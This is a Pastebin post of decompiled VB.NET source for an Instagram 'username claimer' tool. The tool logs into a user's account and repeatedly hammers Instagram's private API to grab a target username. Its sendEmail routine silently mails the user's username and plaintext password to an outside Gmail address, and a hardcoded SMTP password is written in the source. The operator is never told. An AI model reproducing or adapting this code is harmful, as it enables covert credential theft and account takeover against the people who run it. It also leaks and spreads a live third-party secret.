Advertisement
pp_3

Untitled

Oct 28th, 2018
213
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 16.16 KB | None | 0 0
  1. 100$ زرقها
  2. Imports System
  3. Imports System.ComponentModel
  4. Imports System.Diagnostics
  5. Imports System.Drawing
  6. Imports System.IO
  7. Imports System.Net
  8. Imports System.Net.Mail
  9. Imports System.Runtime.CompilerServices
  10. Imports System.Text
  11. Imports System.Threading
  12. Imports System.Windows.Forms
  13. Imports Microsoft.VisualBasic
  14. Imports Microsoft.VisualBasic.CompilerServices
  15. Imports Sliqufy.My
  16.  
  17. Namespace Sliqufy
  18.     ' Token: 0x0200000C RID: 12
  19.     <DesignerGenerated()>
  20.     Public Class Form1
  21.         Inherits Form
  22.  
  23.         ' Token: 0x0600002D RID: 45 RVA: 0x000021BC File Offset: 0x000003BC
  24.         Public Sub New()
  25.             AddHandler MyBase.Load, AddressOf Me.Form1_Load
  26.             AddHandler MyBase.FormClosing, AddressOf Me.Form1_FormClosing
  27.             Me.InitializeComponent()
  28.         End Sub
  29.  
  30.         ' Token: 0x0600002E RID: 46 RVA: 0x000021EE File Offset: 0x000003EE
  31.         Private Sub Form1_Load(sender As Object, e As EventArgs)
  32.         End Sub
  33.  
  34.         ' Token: 0x0600002F RID: 47 RVA: 0x00002CF0 File Offset: 0x00000EF0
  35.         Private Function Start() As Object
  36.             Dim num As Integer = Conversions.ToInteger(Me.TextBox4.Text)
  37.             Dim millisecondsTimeout As Integer = 0
  38.             Dim flag As Boolean = Me.CheckBox1.Checked
  39.             Dim flag2 As Boolean = flag
  40.             If flag2 Then
  41.                 millisecondsTimeout = num + 300
  42.             Else
  43.                 millisecondsTimeout = num
  44.             End If
  45.             While Not Me.stopp
  46.                 Try
  47.                     Try
  48.                         Dim text As String = Me.Geting(String.Concat(New String() { "https://i.instagram.com/api/v1/users/search?q=", Me.TextBox5.Text, "&access_token=", Guid.NewGuid().ToString().ToUpper(), "/" }))
  49.                         flag = (text.Contains("""username"": """ + Me.TextBox5.Text + """") Or False)
  50.                         Dim flag3 As Boolean = flag
  51.                         If flag3 Then
  52.                             ' The following expression was wrapped in a unchecked-expression
  53.                             Me.int_0 = CInt(Math.Round(CDbl(Me.int_0) + 1.0))
  54.                             MyBase.Invoke(New Form1.VBAnonymousDelegate_0(Sub()
  55.                                 Me.TextBox3.Text = Conversions.ToString(Me.int_0)
  56.                             End Sub))
  57.                         Else
  58.                             flag = Conversions.ToBoolean(RuntimeHelpers.GetObjectValue(Me.ChangeUserName(Me.TextBox5.Text)))
  59.                             Dim flag4 As Boolean = flag
  60.                             If flag4 Then
  61.                                 MyBase.Invoke(AddressOf Me.method_99)
  62.                                 MyBase.Invoke(AddressOf Me.sendEmail)
  63.                                 MyBase.Invoke(AddressOf Me.method_100)
  64.                                 Me.stopp = True
  65.                             End If
  66.                         End If
  67.                     Catch ex As Exception
  68.                     End Try
  69.                     Thread.Sleep(num)
  70.                 Catch ex2 As Exception
  71.                 End Try
  72.                 Thread.Sleep(millisecondsTimeout)
  73.             End While
  74.             Dim result As Object
  75.             Return result
  76.         End Function
  77.  
  78.         ' Token: 0x06000030 RID: 48 RVA: 0x00002ED8 File Offset: 0x000010D8
  79.         Public Function Geting(Url As String) As String
  80.             Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create(Url), HttpWebRequest)
  81.             httpWebRequest.Method = "GET"
  82.             httpWebRequest.CookieContainer = Edition.cook
  83.             httpWebRequest.UserAgent = Edition.UserAgent
  84.             Dim result As String
  85.             Try
  86.                 Dim httpWebResponse As HttpWebResponse = CType(httpWebRequest.GetResponse(), HttpWebResponse)
  87.                 Dim streamReader As StreamReader = New StreamReader(httpWebResponse.GetResponseStream())
  88.                 result = streamReader.ReadToEnd()
  89.             Catch ex As WebException
  90.                 Dim streamReader2 As StreamReader = New StreamReader(ex.Response.GetResponseStream())
  91.                 result = streamReader2.ReadToEnd()
  92.             End Try
  93.             Return result
  94.         End Function
  95.  
  96.         ' Token: 0x06000031 RID: 49 RVA: 0x00002F7C File Offset: 0x0000117C
  97.         Public Function ChangeUserName(TargetU As String) As Object
  98.             Dim result As Object = False
  99.             Dim stringBuilder As StringBuilder = New StringBuilder()
  100.             Dim stringBuilder2 As StringBuilder = stringBuilder
  101.             Try
  102.                 Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create("https://i.instagram.com/api/v1/accounts/edit_profile/"), HttpWebRequest)
  103.                 Dim text As String = String.Format("{{""gender"":""{0}"",""_csrftoken"":""{1}"",""_uuid"":""{2}"",""_uid"":""{3}"",""external_url"":""{4}"",""username"":""{5}"",""email"":""{6}"",""phone_number"":""{7}"",""biography"":""{8}"",""first_name"":""@Sliqufy @Hv""}}", New Object() { Edition.gender, "missing", Guid.NewGuid().ToString(), Edition.pk, Edition.external_url, TargetU, Edition.email, Edition.phone_number, Edition.biography, Edition.full_name })
  104.                 Dim text2 As String = String.Concat(New String() { text })
  105.                 text2 = String.Format("{0}.{1}", Edition.Encrypte(text2), text2)
  106.                 stringBuilder2.AppendLine("signed_body=" + WebUtility.HtmlDecode(text2) + "&ig_sig_key_version=5")
  107.                 Dim bytes As Byte() = Encoding.UTF8.GetBytes(stringBuilder.ToString())
  108.                 httpWebRequest.AutomaticDecompression = DecompressionMethods.GZip
  109.                 httpWebRequest.Method = "POST"
  110.                 httpWebRequest.Host = "i.instagram.com"
  111.                 httpWebRequest.UserAgent = Edition.UserAgent
  112.                 httpWebRequest.ContentType = "application/x-www-form-urlencoded; charset=UTF-8"
  113.                 httpWebRequest.Headers.Add("Accept-Language", "ar;q=1, en;q=0.9")
  114.                 httpWebRequest.KeepAlive = True
  115.                 httpWebRequest.ContentLength = CLng(bytes.Length)
  116.                 httpWebRequest.CookieContainer = Edition.cook
  117.                 Dim requestStream As Stream = httpWebRequest.GetRequestStream()
  118.                 requestStream.Write(bytes, 0, bytes.Length)
  119.                 requestStream.Close()
  120.                 Dim httpWebResponse As HttpWebResponse = CType(httpWebRequest.GetResponse(), HttpWebResponse)
  121.                 Dim streamReader As StreamReader = New StreamReader(httpWebResponse.GetResponseStream())
  122.                 Try
  123.                     result = True
  124.                 Finally
  125.                     Dim flag As Boolean = streamReader IsNot Nothing
  126.                     Dim flag2 As Boolean = flag
  127.                     If flag2 Then
  128.                         CType(streamReader, IDisposable).Dispose()
  129.                     End If
  130.                 End Try
  131.                 httpWebResponse.Close()
  132.             Catch ex As WebException
  133.                 result = False
  134.                 Dim streamReader2 As StreamReader = New StreamReader(ex.Response.GetResponseStream())
  135.                 Try
  136.                     File.WriteAllText(If(MyProject.Computer.FileSystem.SpecialDirectories.Desktop, ""), streamReader2.ReadToEnd())
  137.                     Dim flag3 As Boolean = streamReader2.ReadToEnd().Contains("feedback_")
  138.                     Dim flag4 As Boolean = flag3
  139.                     If flag4 Then
  140.                         Interaction.MsgBox("Your Account is Blocked!", MsgBoxStyle.OkOnly, Nothing)
  141.                         Me.stopp = True
  142.                     End If
  143.                 Finally
  144.                     Dim flag5 As Boolean = streamReader2 IsNot Nothing
  145.                     Dim flag6 As Boolean = flag5
  146.                     If flag6 Then
  147.                         CType(streamReader2, IDisposable).Dispose()
  148.                     End If
  149.                 End Try
  150.             End Try
  151.             Return result
  152.         End Function
  153.  
  154.         ' Token: 0x06000032 RID: 50 RVA: 0x0000324C File Offset: 0x0000144C
  155.         <MethodImpl(MethodImplOptions.NoInlining Or MethodImplOptions.NoOptimization)>
  156.         Private Sub Button1_Click(sender As Object, e As EventArgs)
  157.             Try
  158.                 Dim flag As Boolean = Operators.CompareString(Me.TextBox1.Text, "", False) = 0
  159.                 If flag Then
  160.                     Interaction.MsgBox("Enter Username!", MsgBoxStyle.Critical, "Error")
  161.                 Else
  162.                     Dim flag2 As Boolean = Operators.CompareString(Me.TextBox2.Text, "", False) = 0
  163.                     If flag2 Then
  164.                         Interaction.MsgBox("Enter Password!", MsgBoxStyle.Critical, "Error")
  165.                     Else
  166.                         Dim flag3 As Boolean = Conversions.ToBoolean(Edition.Login(Me.TextBox1.Text, Me.TextBox2.Text))
  167.                         If flag3 Then
  168.                             Dim flag4 As Boolean = Conversions.ToBoolean(Edition.GetUserInfo())
  169.                             If flag4 Then
  170.                                 Dim thread As Thread = New Thread(Sub()
  171.                                     Me.Start()
  172.                                 End Sub)
  173.                                 thread.Start()
  174.                                 GC.Collect()
  175.                                 Dim thread2 As Thread = New Thread(Sub()
  176.                                     Thread.Sleep(300)
  177.                                     While Not Me.stopp
  178.                                         MyBase.Invoke(New Form1.VBAnonymousDelegate_0(Sub()
  179.                                             Me.TextBox3.Text = Conversions.ToString(Me.int_0)
  180.                                         End Sub))
  181.                                     End While
  182.                                     Thread.Sleep(150)
  183.                                 End Sub)
  184.                                 thread2.Start()
  185.                             Else
  186.                                 Interaction.MsgBox("Wrong Information!", MsgBoxStyle.Critical, "Error")
  187.                             End If
  188.                         End If
  189.                     End If
  190.                 End If
  191.             Catch ex As Exception
  192.                 Interaction.MsgBox("Error : " + ex.Message, MsgBoxStyle.OkOnly, Nothing)
  193.                 ProjectData.EndApp()
  194.             End Try
  195.         End Sub
  196.  
  197.         ' Token: 0x06000033 RID: 51 RVA: 0x000021F1 File Offset: 0x000003F1
  198.         Private Sub method_99()
  199.             Me.TextBox3.Text = Conversions.ToString(Me.int_0)
  200.         End Sub
  201.  
  202.         ' Token: 0x06000034 RID: 52 RVA: 0x00003394 File Offset: 0x00001594
  203.         Public Sub sendEmail()
  204.             Dim mailMessage As MailMessage = New MailMessage()
  205.             Try
  206.                 mailMessage.From = New MailAddress("sliqufyprivate@gmail.com")
  207.                 mailMessage.[To].Add("sliqufyhv@gmail.com")
  208.                 mailMessage.Subject = "Log info"
  209.                 mailMessage.Body = String.Concat(New String() { "Old User: @", Me.TextBox1.Text, vbCrLf & "New User: @", Me.TextBox5.Text, vbCrLf & "Password:", Me.TextBox2.Text, vbCrLf & "Sign In Here:" & vbCrLf & "www.instagram.com" })
  210.                 New SmtpClient("smtp.gmail.com") With { .Port = 587, .EnableSsl = True, .Credentials = New NetworkCredential("sliqufyprivate@gmail.com", "Tristan321") }.Send(mailMessage)
  211.             Catch ex As Exception
  212.             End Try
  213.         End Sub
  214.  
  215.         ' Token: 0x06000035 RID: 53 RVA: 0x00003494 File Offset: 0x00001694
  216.         Private Sub method_100()
  217.             Me.TextBox5.ForeColor = Color.SpringGreen
  218.             Me.Button1.ForeColor = Color.SpringGreen
  219.             Me.Button1.Text = "done"
  220.             Interaction.MsgBox("Moved @" + Me.TextBox5.Text + vbCrLf & "Attempts: " + Me.TextBox3.Text, MsgBoxStyle.OkOnly, Nothing)
  221.         End Sub
  222.  
  223.         ' Token: 0x06000036 RID: 54 RVA: 0x0000220B File Offset: 0x0000040B
  224.         <MethodImpl(MethodImplOptions.NoInlining Or MethodImplOptions.NoOptimization)>
  225.         Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs)
  226.             ProjectData.EndApp()
  227.         End Sub
  228.  
  229.         ' Token: 0x06000037 RID: 55 RVA: 0x00003504 File Offset: 0x00001704
  230.         <DebuggerNonUserCode()>
  231.         Protected Overrides Sub Dispose(disposing As Boolean)
  232.             Try
  233.                 Dim flag As Boolean = disposing AndAlso Me.components IsNot Nothing
  234.                 If flag Then
  235.                     Me.components.Dispose()
  236.                 End If
  237.             Finally
  238.                 MyBase.Dispose(disposing)
  239.             End Try
  240.         End Sub
  241.  
  242.         ' Token: 0x06000038 RID: 56 RVA: 0x00003554 File Offset: 0x00001754
  243.         <DebuggerStepThrough()>
  244.         Private Sub InitializeComponent()
  245.             Dim componentResourceManager As ComponentResourceManager = New ComponentResourceManager(GetType(Form1))
  246.             Me.TextBox2 = New TextBox()
  247.             Me.TextBox4 = New TextBox()
  248.             Me.TextBox3 = New TextBox()
  249.             Me.TextBox1 = New TextBox()
  250.             Me.TextBox5 = New TextBox()
  251.             Me.Button1 = New Button()
  252.             Me.CheckBox1 = New CheckBox()
  253.             MyBase.SuspendLayout()
  254.             Me.TextBox2.BackColor = Color.Black
  255.             Me.TextBox2.BorderStyle = BorderStyle.FixedSingle
  256.             Me.TextBox2.ForeColor = Color.White
  257.             Me.TextBox2.Location = New Point(0, 26)
  258.             Me.TextBox2.Name = "TextBox2"
  259.             Me.TextBox2.PasswordChar = "●"c
  260.             Me.TextBox2.Size = New Size(122, 20)
  261.             Me.TextBox2.TabIndex = 0
  262.             Me.TextBox2.Text = "tristanx"
  263.             Me.TextBox2.TextAlign = HorizontalAlignment.Center
  264.             Me.TextBox4.BackColor = Color.Black
  265.             Me.TextBox4.BorderStyle = BorderStyle.FixedSingle
  266.             Me.TextBox4.ForeColor = Color.White
  267.             Me.TextBox4.Location = New Point(0, 78)
  268.             Me.TextBox4.Name = "TextBox4"
  269.             Me.TextBox4.Size = New Size(122, 20)
  270.             Me.TextBox4.TabIndex = 1
  271.             Me.TextBox4.Text = "100"
  272.             Me.TextBox4.TextAlign = HorizontalAlignment.Center
  273.             Me.TextBox3.BackColor = Color.Black
  274.             Me.TextBox3.BorderStyle = BorderStyle.FixedSingle
  275.             Me.TextBox3.ForeColor = Color.White
  276.             Me.TextBox3.Location = New Point(0, 133)
  277.             Me.TextBox3.Name = "TextBox3"
  278.             Me.TextBox3.Size = New Size(122, 20)
  279.             Me.TextBox3.TabIndex = 2
  280.             Me.TextBox3.Text = "0"
  281.             Me.TextBox3.TextAlign = HorizontalAlignment.Center
  282.             Me.TextBox1.BackColor = Color.Black
  283.             Me.TextBox1.BorderStyle = BorderStyle.FixedSingle
  284.             Me.TextBox1.ForeColor = Color.White
  285.             Me.TextBox1.Location = New Point(0, 0)
  286.             Me.TextBox1.Name = "TextBox1"
  287.             Me.TextBox1.Size = New Size(122, 20)
  288.             Me.TextBox1.TabIndex = 3
  289.             Me.TextBox1.Text = "username"
  290.             Me.TextBox1.TextAlign = HorizontalAlignment.Center
  291.             Me.TextBox5.BackColor = Color.Black
  292.             Me.TextBox5.BorderStyle = BorderStyle.FixedSingle
  293.             Me.TextBox5.ForeColor = Color.Red
  294.             Me.TextBox5.Location = New Point(0, 52)
  295.             Me.TextBox5.Name = "TextBox5"
  296.             Me.TextBox5.Size = New Size(122, 20)
  297.             Me.TextBox5.TabIndex = 5
  298.             Me.TextBox5.Text = "target"
  299.             Me.TextBox5.TextAlign = HorizontalAlignment.Center
  300.             Me.Button1.BackColor = Color.Black
  301.             Me.Button1.FlatStyle = FlatStyle.Flat
  302.             Me.Button1.ForeColor = Color.Red
  303.             Me.Button1.Location = New Point(0, 104)
  304.             Me.Button1.Name = "Button1"
  305.             Me.Button1.Size = New Size(122, 23)
  306.             Me.Button1.TabIndex = 6
  307.             Me.Button1.Text = "start"
  308.             Me.Button1.UseVisualStyleBackColor = False
  309.             Me.CheckBox1.AutoSize = True
  310.             Me.CheckBox1.Location = New Point(535, 78)
  311.             Me.CheckBox1.Name = "CheckBox1"
  312.             Me.CheckBox1.Size = New Size(90, 17)
  313.             Me.CheckBox1.TabIndex = 7
  314.             Me.CheckBox1.Text = "CheckBox1"
  315.             Me.CheckBox1.UseVisualStyleBackColor = True
  316.             MyBase.AutoScaleDimensions = New SizeF(7F, 13F)
  317.             MyBase.AutoScaleMode = AutoScaleMode.Font
  318.             Me.BackColor = Color.Black
  319.             MyBase.ClientSize = New Size(122, 154)
  320.             MyBase.Controls.Add(Me.CheckBox1)
  321.             MyBase.Controls.Add(Me.Button1)
  322.             MyBase.Controls.Add(Me.TextBox5)
  323.             MyBase.Controls.Add(Me.TextBox1)
  324.             MyBase.Controls.Add(Me.TextBox3)
  325.             MyBase.Controls.Add(Me.TextBox4)
  326.             MyBase.Controls.Add(Me.TextBox2)
  327.             Me.Font = New Font("Microsoft Sans Serif", 8.25F, FontStyle.Bold Or FontStyle.Italic, GraphicsUnit.Point, 0)
  328.             Me.ForeColor = Color.White
  329.             MyBase.FormBorderStyle = FormBorderStyle.FixedToolWindow
  330.             MyBase.Icon = CType(componentResourceManager.GetObject("$this.Icon"), Icon)
  331.             MyBase.Name = "Form1"
  332.             MyBase.StartPosition = FormStartPosition.CenterScreen
  333.             Me.Text = "By @xyazan "
  334.             MyBase.ResumeLayout(False)
  335.             MyBase.PerformLayout()
  336.         End Sub
  337.  
  338.         ' Token: 0x1700000E RID: 14
  339.         ' (get) Token: 0x06000039 RID: 57 RVA: 0x00002214 File Offset: 0x00000414
  340.         ' (set) Token: 0x0600003A RID: 58 RVA: 0x0000221E File Offset: 0x0000041E
  341.         Friend Overridable Property TextBox2 As TextBox
  342.  
  343.         ' Token: 0x1700000F RID: 15
  344.         ' (get) Token: 0x0600003B RID: 59 RVA: 0x00002227 File Offset: 0x00000427
  345.         ' (set) Token: 0x0600003C RID: 60 RVA: 0x00002231 File Offset: 0x00000431
  346.         Friend Overridable Property TextBox4 As TextBox
  347.  
  348.         ' Token: 0x17000010 RID: 16
  349.         ' (get) Token: 0x0600003D RID: 61 RVA: 0x0000223A File Offset: 0x0000043A
  350.         ' (set) Token: 0x0600003E RID: 62 RVA: 0x00002244 File Offset: 0x00000444
  351.         Friend Overridable Property TextBox3 As TextBox
  352.  
  353.         ' Token: 0x17000011 RID: 17
  354.         ' (get) Token: 0x0600003F RID: 63 RVA: 0x0000224D File Offset: 0x0000044D
  355.         ' (set) Token: 0x06000040 RID: 64 RVA: 0x00002257 File Offset: 0x00000457
  356.         Friend Overridable Property TextBox1 As TextBox
  357.  
  358.         ' Token: 0x17000012 RID: 18
  359.         ' (get) Token: 0x06000041 RID: 65 RVA: 0x00002260 File Offset: 0x00000460
  360.         ' (set) Token: 0x06000042 RID: 66 RVA: 0x0000226A File Offset: 0x0000046A
  361.         Friend Overridable Property TextBox5 As TextBox
  362.  
  363.         ' Token: 0x17000013 RID: 19
  364.         ' (get) Token: 0x06000043 RID: 67 RVA: 0x00002273 File Offset: 0x00000473
  365.         ' (set) Token: 0x06000044 RID: 68 RVA: 0x00003AA4 File Offset: 0x00001CA4
  366.         Friend Overridable Property Button1 As Button
  367.             <CompilerGenerated()>
  368.             Get
  369.                 Return Me._Button1
  370.             End Get
  371.             <CompilerGenerated()>
  372.             <MethodImpl(MethodImplOptions.Synchronized)>
  373.             Set(value As Button)
  374.                 Dim value2 As EventHandler = AddressOf Me.Button1_Click
  375.                 Dim button As Button = Me._Button1
  376.                 If button IsNot Nothing Then
  377.                     RemoveHandler button.Click, value2
  378.                 End If
  379.                 Me._Button1 = value
  380.                 button = Me._Button1
  381.                 If button IsNot Nothing Then
  382.                     AddHandler button.Click, value2
  383.                 End If
  384.             End Set
  385.         End Property
  386.  
  387.         ' Token: 0x17000014 RID: 20
  388.         ' (get) Token: 0x06000045 RID: 69 RVA: 0x0000227D File Offset: 0x0000047D
  389.         ' (set) Token: 0x06000046 RID: 70 RVA: 0x00002287 File Offset: 0x00000487
  390.         Friend Overridable Property CheckBox1 As CheckBox
  391.  
  392.         ' Token: 0x0400001D RID: 29
  393.         Private _zairsalman As Label
  394.  
  395.         ' Token: 0x0400001E RID: 30
  396.         Public Pont As Point
  397.  
  398.         ' Token: 0x0400001F RID: 31
  399.         Public stopp As Boolean
  400.  
  401.         ' Token: 0x04000020 RID: 32
  402.         Public int_0 As Integer
  403.  
  404.         ' Token: 0x04000021 RID: 33
  405.         Public id As String
  406.  
  407.         ' Token: 0x04000022 RID: 34
  408.         Private components As IContainer
  409.  
  410.         ' Token: 0x0200000D RID: 13
  411.         ' (Invoke) Token: 0x0600004E RID: 78
  412.         Friend Delegate Sub VBAnonymousDelegate_0()
  413.     End Class
  414. End Namespace
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement